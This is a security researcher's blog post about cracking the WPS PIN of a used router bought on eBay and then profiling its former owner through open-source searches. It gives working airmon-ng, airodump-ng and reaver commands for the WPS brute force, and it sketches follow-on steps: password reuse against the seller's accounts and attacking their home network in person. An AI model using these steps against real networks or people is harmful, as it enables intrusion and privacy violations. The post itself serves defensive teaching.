![]() Hacking ensued. In the following blog post the names of the individuals involved as well as their SSID's/Username's/Credential's have been modified to protect the innocent. This post is not specifically about the WPS attack. There are plenty of articles detailing the WPS attack already. However, this post came about after using it to attack a router I bought on Ebay, so here is a brief background:
I needed a wireless router with WPS to demonstrate this attack on so I searched on Ebay. There is a good list of routers that are vulnerable to the WPS attack here. After searching for a few of the different routers on Ebay, the cheapest I found was an auction for a Cisco Linksys E1000. I ended up winning the auction for $10 with free shipping. After receiving the router I immediately plugged it in and it powered itself on. I checked my available Wi-Fi networks and to my surprise there was a new network that was not named "linksys". I found myself looking at a network called "Battle Falcon!!". Battle Falcon huh? With a WPA2 PSK on my newly obtained router? I could have just held the reset button down for the 10 seconds it takes to factory reset it and have an open "linksys" network to play with... but where's the fun in that? I decided to use the same technique that I was going to demonstrate at the lecture I will be giving. First, I fired up my Kali VM. Then I plugged in my Alfa AWUS036H wireless card. I ran the following commands: airmon-ng check kill <-- kills any processes that may interfere with airmon airmon-ng start wlan0 <-- puts the wireless card into monitor mode airodump-ng mon0 <-- starts sniffing packets and grab the BSSID of the AP After grabbing the BSSID the next step was to run Reaver against the router to brute force its WPS PIN and obtain the PSK. reaver -i mon0 -b 00:11:22:33:44:55 -v <-- Starts brute forcing the WPS PIN.
This can take anywhere between 3 and 12 hours usually so I let it run overnight. In the morning I was looking at the pre-shared key that belonged to the "Battle Falcon!!" network. You might say "So what!? You have the password for a Wi-Fi network that no one is connected to. What harm can come of that?" Well let's look at it from an open-source intelligence (OSINT) view. What do I know about the person who sold me the router before I do any reconnaissance?
What else can we find out about this person using OSINT?
So what do we have now?
This is where I, as an ethical security researcher, have stopped. If this person were the target of a penetration test and we have permission to attack the subject directly we could then proceed in attempting to login to the targets various accounts using the password we got from brute forcing the WPS PIN on their wireless router. It's pretty obvious password reuse could come into play here since the subjects username appears to follow the same trend. Luckily, this subject didn't have a public LinkedIn account where we could easily find out where they worked. If they did we might be able to figure out a corporate login based off of what we know about the subject. Oh, and if I was really determined to compromise more accounts of this subjects I could just drive to their house and jump on their new wireless network more than likely using the same credentials as the one I bought and then just sniff their traffic, attack their hosts, man-in-the-middle them, etc. There are three things to take away from this. One, don't reuse your passwords. Two, be careful about what you are posting publicly. Three, don't sell electronic equipment that has not been factory reset or wiped completely of all your data. There are some really evil people out there that would have probably gone a lot farther than I did. This shows how important reconnaissance is when performing a penetration test. I have not sent one packet to the targets network or tried to break into any of their accounts. But, I have a lot of information that would prove very valuable if we were performing a penetration test against them. |
root@dafthack:~# >